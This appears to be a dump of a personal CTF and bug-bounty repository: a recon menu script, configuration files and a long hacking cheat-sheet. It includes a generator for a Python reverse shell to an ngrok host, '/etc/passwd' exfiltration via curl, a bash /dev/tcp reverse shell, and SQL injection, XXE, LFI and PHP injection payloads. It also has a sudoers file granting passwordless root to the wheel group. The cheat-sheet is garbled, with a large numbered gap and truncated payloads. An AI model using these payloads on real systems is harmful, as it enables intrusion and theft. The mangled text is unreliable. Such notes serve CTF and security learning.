├── nc ├── requests.zip ├── centos1.repo ├── mm.js ├── all-payload4.html ├── key ├── asd.py ├── sudoers ├── automate.sh └── ctf.txt /nc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ranjit-git/CTF/HEAD/nc -------------------------------------------------------------------------------- /requests.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ranjit-git/CTF/HEAD/requests.zip -------------------------------------------------------------------------------- /centos1.repo: -------------------------------------------------------------------------------- 1 | [centos] 2 | name=CentOS-7 3 | baseurl=http://ftp.heanet.ie/pub/centos/7/os/x86_64/ 4 | enabled=1 5 | gpgcheck=1 6 | gpgkey=http://ftp.heanet.ie/pub/centos/7/os/x86_64/RPM-GPG-KEY-CentOS-7 7 | -------------------------------------------------------------------------------- /mm.js: -------------------------------------------------------------------------------- 1 | var request=require("/catalyst/functions/Root/node_modules/requests"); 2 | request('http://n5t6dff5n39mlth4prdsrd0o5fb5zu.burpcollaborator.net/apod?api_key=eeww', { json: true }, (err, ress, body) => { 3 | if (err) { return console.log(err); } 4 | //console.log(body.url); 5 | //console.log(body.explanation); 6 | }); 7 | -------------------------------------------------------------------------------- /all-payload4.html: -------------------------------------------------------------------------------- 1 | hgjg 2 | -------------------------------------------------------------------------------- /key: -------------------------------------------------------------------------------- 1 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBy5UFPAyGQvnz9EskuaNVgjwCknZWnAeF5qPgb7RC9OGp3m07uHMv9x2R4M0rtmg2fI84LBkqj80AenDaF+W7k+h+Mc4E/q+MVQjc3/Qhfq2+Todm01n5eP2pU5oO23iS16KMTcdrYqMIU2rM1thT2PnjOdCP8AF9yNN/XRr3eD77qNiOYo5qKAn1+zZWCuI8S3J3RvicHneqEbRz0mDqxrYUQxH60LdAPQCI2VlfBx4eMpv9uzdUZ7tptLHi1w8oCIJsuNOwDYVUtX67r6P9PVOlUoIz6cOIXK+xwM4/NLOyNcQ/MTiY4ICAe07FF9V8apKq6oIKfkWjjDunvixz pahan@user-X550CA 2 | -------------------------------------------------------------------------------- /asd.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | #print sys.argv[1] 4 | print "Command: python a.py port output_file" 5 | l=""" 6 | import socket,subprocess,os; 7 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 8 | s.connect(("0.tcp.ngrok.io","""+str(sys.argv[1])+""")); 9 | os.dup2(s.fileno(),0); 10 | os.dup2(s.fileno(),1); 11 | os.dup2(s.fileno(),2); 12 | p=subprocess.call(["/bin/sh","-i"]); 13 | """ 14 | f=open(sys.argv[2],"w") 15 | f.write(l) 16 | f.close() 17 | -------------------------------------------------------------------------------- /sudoers: -------------------------------------------------------------------------------- 1 | ## Sudoers allows particular users to run various commands as 2 | ## the root user, without needing the root password. 3 | ## 4 | ## Examples are provided at the bottom of the file for collections 5 | ## of related commands, which can then be delegated out to particular 6 | ## users or groups. 7 | ## 8 | ## This file must be edited with the 'visudo' command. 9 | 10 | ## Host Aliases 11 | ## Groups of machines. You may prefer to use hostnames (perhaps using 12 | ## wildcards for entire domains) or IP addresses instead. 13 | # Host_Alias FILESERVERS = fs1, fs2 14 | # Host_Alias MAILSERVERS = smtp, smtp2 15 | 16 | ## User Aliases 17 | ## These aren't often necessary, as you can use regular groups 18 | ## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname 19 | ## rather than USERALIAS 20 | # User_Alias ADMINS = jsmith, mikem 21 | 22 | 23 | ## Command Aliases 24 | ## These are groups of related commands... 25 | 26 | ## Networking 27 | # Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, /usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool 28 | 29 | ## Installation and management of software 30 | # Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum 31 | 32 | ## Services 33 | # Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig 34 | 35 | ## Updating the locate database 36 | # Cmnd_Alias LOCATE = /usr/bin/updatedb 37 | 38 | ## Storage 39 | # Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount 40 | 41 | ## Delegating permissions 42 | # Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp 43 | 44 | ## Processes 45 | # Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall 46 | 47 | ## Drivers 48 | # Cmnd_Alias DRIVERS = /sbin/modprobe 49 | 50 | # Defaults specification 51 | 52 | # 53 | # Disable "ssh hostname sudo ", because it will show the password in clear. 54 | # You have to run "ssh -t hostname sudo ". 55 | # 56 | Defaults requiretty 57 | 58 | # 59 | # Refuse to run if unable to disable echo on the tty. This setting should also be 60 | # changed in order to be able to use sudo without a tty. See requiretty above. 61 | # 62 | Defaults !visiblepw 63 | 64 | # 65 | # Preserving HOME has security implications since many programs 66 | # use it when searching for configuration files. Note that HOME 67 | # is already set when the the env_reset option is enabled, so 68 | # this option is only effective for configurations where either 69 | # env_reset is disabled or HOME is present in the env_keep list. 70 | # 71 | Defaults always_set_home 72 | 73 | Defaults env_reset 74 | Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS" 75 | Defaults env_keep += "MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE" 76 | Defaults env_keep += "LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES" 77 | Defaults env_keep += "LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE" 78 | Defaults env_keep += "LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY" 79 | 80 | # 81 | # Adding HOME to env_keep may enable a user to run unrestricted 82 | # commands via sudo. 83 | # 84 | # Defaults env_keep += "HOME" 85 | 86 | Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin 87 | 88 | ## Next comes the main part: which users can run what software on 89 | ## which machines (the sudoers file can be shared between multiple 90 | ## systems). 91 | ## Syntax: 92 | ## 93 | ## user MACHINE=COMMANDS 94 | ## 95 | ## The COMMANDS section may have other options added to it. 96 | ## 97 | ## Allow root to run any commands anywhere 98 | root ALL=(ALL) ALL 99 | 100 | ## Allows members of the 'sys' group to run networking, software, 101 | ## service management apps and more. 102 | # %sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS 103 | 104 | ## Allows people in group wheel to run all commands 105 | # %wheel ALL=(ALL) ALL 106 | 107 | ## Same thing without a password 108 | %wheel ALL=(ALL) NOPASSWD: ALL 109 | 110 | ## Allows members of the users group to mount and unmount the 111 | ## cdrom as root 112 | # %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom 113 | 114 | ## Allows members of the users group to shutdown this system 115 | # %users localhost=/sbin/shutdown -h now 116 | 117 | ## Read drop-in files from /etc/sudoers.d (the # here does not mean a comment) 118 | #includedir /etc/sudoers.d 119 | -------------------------------------------------------------------------------- /automate.sh: -------------------------------------------------------------------------------- 1 | 2 | 3 | #read -p " $(tput bold)$(tput setaf 1)URL=>$(tput sgr0)" site_url 4 | 5 | echo " $(tput bold)$(tput setaf 3)1. GOOGLE DORK $(tput sgr0) $(tput bold)$(tput setaf 3)9. CMS $(tput sgr0) " 6 | echo " $(tput bold)$(tput setaf 3)2. SUBDOMAIN $(tput sgr0) $(tput bold)$(tput setaf 3)10. OTHERS $(tput sgr0)" 7 | echo " $(tput bold)$(tput setaf 3)3. GITHUB $(tput sgr0) $(tput bold)$(tput setaf 3)11. DNS $(tput sgr0)" 8 | echo " $(tput bold)$(tput setaf 3)3a. GITROB $(tput sgr0) $(tput bold)$(tput setaf 3)11. DNS $(tput sgr0)" 9 | echo " $(tput bold)$(tput setaf 3)4. S3 BUCKET $(tput sgr0) $(tput bold)$(tput setaf 3)12. OSINT $(tput sgr0)" 10 | echo " $(tput bold)$(tput setaf 3)5. VIRTUAL HOST $(tput sgr0) $(tput bold)$(tput setaf 3)13. PROTOCOL EXPLOITER $(tput sgr0)" 11 | echo " $(tput bold)$(tput setaf 3)6. SHODAN $(tput sgr0) $(tput bold)$(tput setaf 3)14. ANDROID APK $(tput sgr0)" 12 | echo " $(tput bold)$(tput setaf 3)7. CENSYS $(tput sgr0) $(tput bold)$(tput setaf 3)15. CLOUDFRONT HIJACKER $(tput sgr0)" 13 | echo " $(tput bold)$(tput setaf 3)8. LINKFINDER $(tput sgr0) $(tput bold)$(tput setaf 3)16. DIRECTORY SCANNER $(tput sgr0)" 14 | 15 | read -p " $(tput bold)$(tput setaf 1)Choose options=>$(tput sgr0)" options 16 | 17 | #while true; do 18 | case $options in 19 | 1 ) echo -e " $(tput bold)$(tput setaf 3)try using api_key\n secret_key\n passwd\n aws_key\n github_token $(tput sgr0)"; 20 | firefox "http://google.com/search?q=site:$site_url api_key"; 21 | 22 | pwd;; 23 | 2 ) echo " $(tput bold)$(tput setaf 3)a.USING GOOGLE DORK $(tput sgr0)" 24 | echo " $(tput bold)$(tput setaf 3)b.USING CENSYS SUBFINDER $(tput sgr0)" 25 | echo " $(tput bold)$(tput setaf 3)c.USING CENSYS CERTIFICATE $(tput sgr0)" 26 | echo " $(tput bold)$(tput setaf 3)d.USING AQUATONE/SUBFINDER/KOCKPY $(tput sgr0)" 27 | echo " $(tput bold)$(tput setaf 3)e.USING DNSTRAIL $(tput sgr0)" 28 | echo " $(tput bold)$(tput setaf 3)f.TAKEOVER USING SUBOVER $(tput sgr0)" 29 | 30 | read -p " $(tput bold)$(tput setaf 1)Choose options=>$(tput sgr0)" options2 31 | case $options2 in 32 | a ) firefox "http://google.com/search?q=site:*.$site_url -www" ;; 33 | b )python /home/user/Desktop/bug_bounty/bugbounty_testing-tools/censys-subdomain-finder/censys_subdomain_finder.py example.com;; 34 | c )firefox "https://censys.io/ipv4?q=443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names%3A"+url;; 35 | d )echo " $(tput bold)$(tput setaf 3)try all of them differently $(tput sgr0)";; 36 | e ) echo " $(tput bold)$(tput setaf 3)https://securitytrails.com/ $(tput sgr0)";; 37 | f ) echo -e " $(tput bold)$(tput setaf 3)Desktop/bug_bounty/bugbounty_testing-tools/subdomain/takeover.py \n subover -l list.txt$(tput sgr0)";; 38 | esac 39 | ;; 40 | 41 | 3 ) firefox "https://github.com/search?utf8=✓&q=$site_url";; 42 | 3a) echo " $(tput bold)$(tput setaf 3)gitrob strings$(tput sgr0)";; 43 | 44 | 4 )echo " $(tput bold)$(tput setaf 3)a.GogetBucket $(tput sgr0)" 45 | ;; 46 | 47 | 5 ) ;; 48 | 6 ) echo -e " $(tput bold)$(tput setaf 3)try hostname:google.com\n port:8182,80\n org:google\n titile:Dashboard [jenkins] $(tput sgr0)";; 49 | #firefox "https://www.shodan.io/search?query=" 50 | 51 | 7 ) echo " $(tput bold)$(tput setaf 3) 443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names%3A $(tput sgr0)" 52 | echo " $(tput bold)$(tput setaf 3)\"hackme.tld\" + internal $(tput sgr0)" 53 | echo " $(tput bold)$(tput setaf 3)\"hackme.tld\" + sandbox $(tput sgr0)" 54 | echo " $(tput bold)$(tput setaf 3)\"hackme.tld\" + staging $(tput sgr0)" 55 | echo " $(tput bold)$(tput setaf 3)\"hackme.tld\" + Development/Dev $(tput sgr0)" 56 | echo " $(tput bold)$(tput setaf 3)\"hackme.tld\" + production/prod $(tput sgr0)" 57 | 58 | ;; 59 | 60 | 8 ) echo " $(tput bold)$(tput setaf 3) Directory /home/user/Desktop/bug_bounty/bugbounty_testing-tools/linkfinder $(tput sgr0)"; 61 | echo " $(tput bold)$(tput setaf 3) python linkfinder.py -i https://example.com -d $(tput sgr0)"; 62 | echo " $(tput bold)$(tput setaf 3) python linkfinder.py -i https://example.com/1.js -o cli $(tput sgr0)" 63 | echo " $(tput bold)$(tput setaf 3) python linkfinder.py -i https://example.com/1.js -o results.html $(tput sgr0)" 64 | 65 | 66 | ;; 67 | 68 | 9 ) echo " $(tput bold)$(tput setaf 3)a.Drupwn $(tput sgr0)" 69 | echo " $(tput bold)$(tput setaf 3)b.Joomscan $(tput sgr0)" 70 | echo " $(tput bold)$(tput setaf 3)c.Wpscan $(tput sgr0)" 71 | echo " $(tput bold)$(tput setaf 3)d.CMSgeek (include all cms) $(tput sgr0)" 72 | 73 | ;; 74 | 11 ) echo " $(tput bold)$(tput setaf 3)a.Whonow (Dns rebinding attack) $(tput sgr0)" 75 | 76 | ;; 77 | 78 | 12 ) echo " $(tput bold)$(tput setaf 3)a.NAMECHK (username find in all website) $(tput sgr0)" 79 | echo " $(tput bold)$(tput setaf 3)./nameshk.sh username -au $(tput sgr0)" 80 | echo " $(tput bold)$(tput setaf 3)b.PwnedOrNot (find password from given email in all data leak) $(tput sgr0)" 81 | echo " $(tput bold)$(tput setaf 3)Desktop/bug_bounty/bugbounty_testing-tools/pwnedOrNot && pythonpownedornot.py $(tput sgr0)" 82 | echo " $(tput bold)$(tput setaf 3)c.Samurai (email discovery via dork,domain,company name) $(tput sgr0)" 83 | echo " $(tput bold)$(tput setaf 3)Desktop/bug_bounty/bugbounty_testing-tools/samurai/samurai.sh $(tput sgr0)" 84 | 85 | ;; 86 | 87 | 13 ) echo " $(tput bold)$(tput setaf 3)a.Metateta $(tput sgr0)" 88 | echo " $(tput bold)$(tput setaf 3)Desktop/bug_bounty/bugbounty_testing-tools/metateta $(tput sgr0)" 89 | echo " $(tput bold)$(tput setaf 3)run.py -R 192.168.1.15-255 -p smb -x exploit $(tput sgr0)" 90 | echo " $(tput bold)$(tput setaf 3)run.py -r 192.168.1.15 -p smtp -x scan $(tput sgr0)" 91 | echo " $(tput bold)$(tput setaf 3)run.py -f hosts.txt -p smb -x auxiliary $(tput sgr0)" 92 | 93 | echo " $(tput bold)$(tput setaf 3)b.AutoNSE $(tput sgr0)" 94 | echo " $(tput bold)$(tput setaf 3)Desktop/bug_bounty/bugbounty_testing-tools/autonse $(tput sgr0)" 95 | ;; 96 | 97 | 98 | 14 ) echo " $(tput bold)$(tput setaf 3)a.Diggy (extract endpoint from apk) $(tput sgr0)" 99 | echo " $(tput bold)$(tput setaf 3)/home/user/Desktop/bug_bounty/bugbounty_testing-tools/diggy/diggy.sh /home/a.apk $(tput sgr0)" 100 | echo " $(tput bold)$(tput setaf 3)b.ReverseApk (auto scanner and detecter) $(tput sgr0)" 101 | echo " $(tput bold)$(tput setaf 3)Desktop/bug_bounty/bugbounty_testing-tools/ReverseAPK/reverse-apk $(tput sgr0)" 102 | echo " $(tput bold)$(tput setaf 3)c.MobSF (auto scanner and detecter) $(tput sgr0)" 103 | echo " $(tput bold)$(tput setaf 3)/home/user/MobSF && sudo python manage.py runserver (auto scanner and detecter) $(tput sgr0)" 104 | echo " $(tput bold)$(tput setaf 3)login 192.168.191.189 && Desktop && sudo python3 manage.py runserver 192.168.191.189:8000 $(tput sgr0)" 105 | 106 | ;; 107 | 108 | 109 | 15 ) echo " $(tput bold)$(tput setaf 3)a.CloudFrunt $(tput sgr0)" 110 | 111 | ;; 112 | 113 | 16 ) echo -e " $(tput bold)$(tput setaf 3)a.Dirb $(tput sgr0)" 114 | echo -e " $(tput bold)$(tput setaf 3)dirb http://example.com -X .php,.html $(tput sgr0)" 115 | echo -e " $(tput bold)$(tput setaf 3)b.Nikto $(tput sgr0)" 116 | echo -e " $(tput bold)$(tput setaf 3)c.Dirbuster $(tput sgr0)" 117 | echo -e " $(tput bold)$(tput setaf 3)d.Wfuzz (directory scanner & parameter bruteforcer) $(tput sgr0)" 118 | echo -e " $(tput bold)$(tput setaf 3)wfuzz -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19 | tee fuzz.log $(tput sgr0)" 119 | ;; 120 | 121 | * ) echo "Please answer yes or no.";; 122 | esac 123 | #done 124 | 125 | -------------------------------------------------------------------------------- /ctf.txt: -------------------------------------------------------------------------------- 1 | IMPORTANT FACT 2 | ========================================================================= 3 | ***for CTF u must understand the hint 4 | ***curl -F shl=@/etc/passwd blablabla.ngrok.io 5 | ***entity_id=1+or+if(mid(@@version,1,1)=5,1,2)=2%23 6 | 7 | **during lfi testing try ..%2f..%2fetc 8 | **bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 9 | **searchsploit for finding exploit 10 | 11 | *webscreenshot to capture shot of webpages 12 | *file://c:\WEB\HTML 13 | *magick hacshes->https://www.whitehatsec.com/blog/magic-hashes/ 14 | *apache sometime directory listing 15 | *hashcat,hash-identifier 16 | *view page source, and visit every directory u found in source code 17 | ** check every possible way, dont be lazzy 18 | **if any send message or comment try "> 202 | 203 | 204 | CROSSDOMAIN 205 | ============= 206 | https://sethsec.blogspot.in/2014/03/exploiting-misconfigured-crossdomainxml.html 207 | http://gursevkalra.blogspot.in/2013/08/bypassing-same-origin-policy-with-flash.html 208 | https://www.paladion.net/blogs/weak-crossdomain-xml-and-its-exploitation-poc 209 | 210 | API 211 | ======================= 212 | https://app.mavenlink.com/api/v1/users 213 | https://app.mavenlink.com/api/v1/users/me 214 | 215 | AUTH BYPASS 216 | ============ 217 | https://login.mailchimp.com/oauth2/authorize?response_type=token&client_id=112041070777&redirect_uri=https%3A%2F%2Fapps.facebook.com%2F attacker%2F 218 | https://prakharprasad.com/facebook-mailchimp-application-oauth-2-0-misconfiguration/ 219 | 220 | FILE UPLOAD 221 | ============ 222 | 1.if image upload try 223 | a) imagemagick out-of-band 224 | b) imagemagick pillete extractor 225 | using https://github.com/neex/gifoeb 226 | ./gifoeb gen 1123x987 dump.jpg 227 | ./gifoeb gen 1123x987 dump.png 228 | ./gifoeb gen 1123x987 dump.bmp 229 | ./gifoeb gen 1123x987 dump.tiff 230 | ./gifoeb gen 1123x987 dump.tif 231 | 232 | 233 | for p in previews/*; do 234 | ./gifoeb recover $p | strings; 235 | done 236 | i)imagemagick curl vulnerability using svg 237 | 238 | https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetragick/ 239 | 240 | c) pixel flood 241 | d) svg upload 242 | e) if image croping then try https://hackerone.com/reports/212696 243 | 2.if video upload 244 | a)ffmpeg ssrf 245 | b)if video caption the xss via subtitle 246 | 247 | 3.svg upload and xxe/xss/setting cookie 248 | 4.shell uploading by null byte/content type change/gif uploading... 249 | 5.directory traversal 250 | 6.if docx,doc,xlsx upload 251 | a) try xxe 252 | 253 | APACHE 254 | ==================== 255 | Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection 256 | ------------------------------------- 257 | action:, redirect:, redirectAction:, method: 258 | http://host/struts2-blank/example/X.action?action:%25{3*4} 259 | https://www.exploit-db.com/exploits/44583/?rss&utm_source=dlvr.it&utm_medium=twitter 260 | 261 | 262 | XXE via spreadsheet(doc,docx,xlsx) 263 | ================================= 264 | **https://buer.haus/xxegen/ 265 | **goto https://github.com/BuffaloWill/oxml_xxe and generate many xxe payload file 266 | ** 267 | read file Read file xxe.xlsx\xl\worksheets\sheet1.xml and add payload 268 | ]> 269 | also u can add &xxe;inside root element or outside root element. 270 | 271 | **unzip docx and edit [Content_Types].xml with bellow payload 272 | 274 | %go2;]> 275 | zip -u xxe.docx \[Content_Types\].xml 276 | ** 277 | you can add payload in following file... 278 | DOCX=>/word/document.xml 279 | PPTX=>/ppt/presentation.xml 280 | XLSX=>/xl/workbook.xml 281 | 282 | XSS 283 | -------------- 284 | < !ENTITY post " 353 | 354 | 5.echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 11211 =>memcached server 355 | 356 | 6.w'h'o'am'i , w"h"o"am"i, who$@ami ,$0 = /bin/bash so , echo whoami|$0 357 | 358 | 7.padding oracle =>padbuster(bellow) detect using decode base64 and count caracter ,it wouldbe multipleof 8,16 359 | 360 | 8.PHP offers three frequently used methods of parsing and consuming XML: PHP DOM, SimpleXML and XMLReader. All three of these use the libxml2 extension and external entity support is enabled by default. As a consequence, PHP has a by-default vulnerability to XXE . 361 | DOMDocument::loadXML()====> also vulnerable to xxe 362 | 363 | $dom = new DOMDocument; 364 | $dom->loadXML($xmlString); 365 | this code is vulnerableto xxe 366 | 367 | mitigation 368 | -------- 369 | $oldValue = libxml_disable_entity_loader(true); 370 | $dom = new DOMDocument(); 371 | $dom->loadXML($xml); 372 | libxml_disable_entity_loader($oldValue); 373 | 374 | /** 375 | * Attempt a quickie detection 376 | */ 377 | $collapsedXML = preg_replace("/[:space:]/", '', $xml); 378 | if(preg_match("/loadXML($xml); 388 | libxml_disable_entity_loader($oldValue); 389 | foreach ($dom->childNodes as $child) { 390 | if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) { 391 | throw new \InvalidArgumentException( 392 | 'Invalid XML: Detected use of illegal DOCTYPE' 393 | ); 394 | } 395 | } 396 | 397 | 398 | 9. load('book.xml'); 401 | echo $doc->saveXML(); 402 | ?> it may also vulnerable to directory travarsal 403 | 404 | 10. 405 | filter_var($_GET['http_url'], FILTER_VALIDATE_URL); 406 | it allow javascript://foobar%0aalert(), php://, zip:// data:// 407 | 408 | 409 | DEBUGING JAVASCRIPT 410 | ========================================================================================== 411 | chrome->source tab-> 412 | create breakpoint anywhere,refresh page,and hover over the varriable before breakpoint and see varriable value. 413 | in right side you can see all local and global varriable value 414 | 415 | PHP 416 | ==================================================================================================================================================================== 417 | 1.TYPE JUGGLING 418 | ---------------- 419 | Try to use functions and operators that do not do implicit type conversions (e.g. === and not ==). Not all operators have strict versions (for example greater than and less than), and many built-in functions (like in_array) use weakly typed comparison functions by default, 420 | 421 | 2. shell executte(shell_exec,exec,proc_open,passthru,system backtick operator,popen,pcntl_exec) 422 | execute(eval,preg_replace with /e modifier,include[_once]/require[_once],create_function,assert(),file_get_contents,readfile,glob,mysql_query ) 423 | more=> https://stackoverflow.com/questions/3115559/exploitable-php-functions 424 | 425 | 3. 426 | $db_link = mysqli_connect('localhost', 'dbuser', 'dbpassword', 'dbname'); 427 | 428 | function can_access_feature($current_user) { 429 | global $db_link; 430 | $username = mysqli_real_escape_string($db_link, $current_user->username); 431 | $res = mysqli_query($db_link, "SELECT COUNT(id) FROM blacklisted_users WHERE username = '$username';"); 432 | $row = mysqli_fetch_array($res); 433 | if ((int)$row[0] > 0) { 434 | return false; 435 | } else { 436 | return true; 437 | } 438 | } 439 | 440 | for example, the database connection could fail, due to a wrong password or the server being down etc., or the connection could be closed by the server after it was opened client side. In these cases, by default the mysqli_ functions will issue warnings or notices, but will not throw exceptions or fatal errors. This means that the code simply carries on! The variable $row becomes NULL, and PHP will evaluate $row[0] also as NULL, and (int)$row[0] as 0, due to weak typing. Eventually the can_access_feature function returns true, giving access to all users, whether they are on the blacklist or not. 441 | 442 | 4. 443 | $location = $_POST['location']; 444 | $filename = "./sites/".$user.".php"; 445 | ...................etc...................... 446 | $html = ""; 454 | $fp = fopen($filename, 'a+'); 455 | fputs($fp, $html) or die("Could not open file!"); 456 | 457 | pass this $location = "";?> 464 | 465 | http://127.0.0.1/test.php?code=system(whoami); 466 | ***must use termination statement ; 467 | 468 | 6. 469 | 476 | http://127.0.0.1/test/php?logged=1 and need to _gloabals = on. 477 | 478 | 7. XMLRPC 479 | ------------- 480 | test.method ','')); phpinfo(); exit;/* 481 | 482 | 8. 483 | ? 492 | http://example.com/inex.php/?page=’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1 493 | 494 | 9. $q=sprintf("UPDATE user set points=%d%s",$_GET['p'],$_GET[asd]]) 495 | here admin password is flag ,so we need to extract password using sql injection 496 | $_GET['p']=1 and $_GET['asd']=*hex(substr((select password),1,1)); //substr or substring both we can use 497 | 498 | 10. 499 | $validatedId = $_POST['id']; 500 | $pdo = new PDO('mysql:store.db'); 501 | $stmt = $pdo->prepare('SELECT * FROM transactions WHERE user_id = :id'); 502 | $stmt->bindParam(':id', $validatedId, PDO::PARAM_INT); 503 | $stmt->execute(); 504 | it automatically escape $validateId parameter and placed in place holder 505 | 506 | 11. 507 | if($_GET["str1"] and $_GET["str2"]) { 508 | if ($_GET["str1"] !== $_GET["str2"] and 509 | hash("md5", $salt . $_GET["str1"]) === hash("md5", $salt . $_GET["str2"])) { 510 | echo $flag; 511 | } 512 | 513 | str1[[]=xss&str2[]=asada 514 | 515 | 516 | code 517 | ========================================================================================= 518 | if(strcmp($PASSWORD, $_GET['password']) == 0){ 519 | $success = true; 520 | } 521 | if passed as password[]=AAAAA then it print success. 522 | 523 | WEB 524 | =============================================================================================== 525 | =============================================================================================== 526 | Problem 527 | ---------- 528 | The bad guys have hidden their access codes on an anonymous secure page service. Our intelligence tells us that the codes was posted on a page with id 43440b22864b30a0098f034eaf940730ca211a55, but unfortunately it's protected by a password, and only site moderators can view the post without the password. Can you help us recover the codes? 529 | >>>for this type ctf we have to create a page with XSS payload and receive cookie and the session hijacking 530 | 531 | Returning fake Row 532 | ------------------------ 533 | random'AND 1=0 UNION ALL SELECT 'admin' AS username, 'hax' AS password, 2000 AS user_level, 10 AS dummy, 10 AS dummy2 -- 534 | 535 | Blind Sqli 536 | ---------------- 537 | admin' AND password LIKE "ya%" -- 538 | 539 | 540 | Perl Vulneraility 541 | =================== 542 | https://ehsandev.com/pico2014/web_exploitation/make_a_face.html 543 | http://www.cgisecurity.com/lib/sips.html 544 | 545 | ZIP/RAR cracker 546 | =================== 547 | 1.rar2john ./a.rar > hash.txt 548 | john ./hash.txt 549 | 2.fcrackzip 550 | fcrackzip -v -m zip6 -l 4-8 -u secret.zip 551 | PDF && PASSWORD 552 | ==================== 553 | rockyou.txt,500-passwords.txt 554 | pdfcrack --wordlist=crackstation-human-only.txt mypassword.pdf 555 | 556 | 557 | encryption/decryption 558 | ========================= 559 | https://quipqiup.com/ (cryptogram) 560 | http://rumkin.com/tools/cipher/ 561 | https://www.cs.drexel.edu/~introcs/Fa11/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt.html 562 | *if does not know what it is try vegenere cypher 563 | https://www.guballa.de/vigenere-solver 564 | https://www.guballa.de/substitution-solver 565 | 566 | *foremost to recover file 567 | *unzip file using unzip so you can see also hidden file if there 568 | *xxd -e file //hexdump with hex and value 569 | binwalk 570 | ============= 571 | binwalk music.mp3 572 | binwalk --dd='.*' music.mp3 573 | 574 | Volatility 575 | ================== 576 | if a proceess running wireshark.exe then u can try search file abc.pcap etc 577 | volatility -f forensic_100.raw imageinfo //image information 578 | volatility -f forensic_100.raw dumpfiles 579 | volatility -f forensic_100.raw clipboard //clipboard content 580 | volatility -f forensic_100.raw cmdscan 581 | volatility -f forensic_100.raw cmdline 582 | volatility -f forensic_100.raw consoles 583 | volatility -f forensic_100.raw connections 584 | volatility -f forensic_100.raw filescan //file scan 585 | volatility -f forensic_100.raw filescan|grep bat //filescan any extension like .bat,.exe,.vbs etc also can search folder name like this 586 | also search file with system username 587 | volatility -f forensic_100.raw dumpfiles -Q 0x..... -D folder //dump file with specified offset 588 | volatility -f forensic_100.raw sockscan 589 | volatility -f forensic_100.raw netscan 590 | volatility -f forensic_100.raw connscan 591 | volatility -f forensic_100.raw pslist //process list only visible process 592 | volatility -f forensic_100.raw psscan //view hidden process also and exit time 593 | volatility -f forensic_100.raw --profile=asd psxview // 594 | volatility -f forensic_100.raw --profile=WinXPSP3x86 sockets //socket lists 595 | volatility -f forensic_100.raw pslist |grep svchost 596 | volatility -f forensic_100.raw --profile=zzxz pslist |grep tcp 597 | volatility -f forensic_100.raw -p 1704 -D dump procdump //dump process memory 598 | strings dump/asd.exe | pdb //compare fake file 599 | 600 | HASH 601 | ================== 602 | 1. john --list=formats|grep -i md4 603 | john --format=Raw-MD4 test.md4 --show 604 | 2.john file //here in file put httpbasic auth 605 | 606 | md5 hash 607 | ================ 608 | 240610708=>0e462097431906509019562988736854 609 | 9QFHA$RNXGMR3IFDU=>0e11012cfa2a998691010213eebc6f98 610 | 4E8F8TK=>0e1100867d17d34f6b50be0e7d4a576d 611 | 5KWNPIES2BZZK=>0e1100864a0b680fa32cb64331ff48ad 612 | QNKCDZO=> 613 | BE||OJ@N =>0e110377766fb49c4d47a46eb4a1d8b8 614 | goto https://md5db.net/explore/ for specific pattern 615 | 616 | ** base32 data only contain CAPITAL letter and = 617 | 618 | **input() in python equivalent to eval(raw_input()) 619 | os.system('/bin/sh') input gives shell 620 | **if python script is obfuscated then may try decode to decimal or something 621 | 622 | RECYCLEBIN FORENSIC 623 | ================ 624 | use rifiuti2 625 | 626 | SYSTEM IMAGE FILE 627 | ================================ 628 | if u given any image file then you can mount it or use in TESTDISK. 629 | 630 | binwalk -A floppy.img //list architecture 631 | fdisk -l floppy.img //list partition of image 632 | 1.first try to mount it 633 | mount -t vfat -o loop flopy.img ./mnt 634 | 2.recover using testdisk 635 | testdisk floppy.img 636 | 3.recover using foremost 637 | 4.run using qemu 638 | qemu-system-x86_64 -fda floppy.img 639 | qemu run with gdb-peda https://github.com/VoidHack/write-ups/tree/master/Square%20CTF%202017/reverse/ 640 | 5.extract using dd 641 | dd if=./floppy.img of=./a.zip bs=1 skip=1234 //find this 1234 offset using binwalk floppy.img 642 | 643 | 6.can use this https://wiki.sleuthkit.org/index.php?title=TSK_Tool_Overview 644 | 645 | 646 | RSA 647 | ======================================================================================== 648 | 649 | openssl rsa -in task/bob3.pub -pubin -text -modulus 650 | openssl rsa -pubin -inform PEM -text -noout < bob.pub 651 | 652 | decrypt using private key + base64 encode of raw ciphertext 653 | 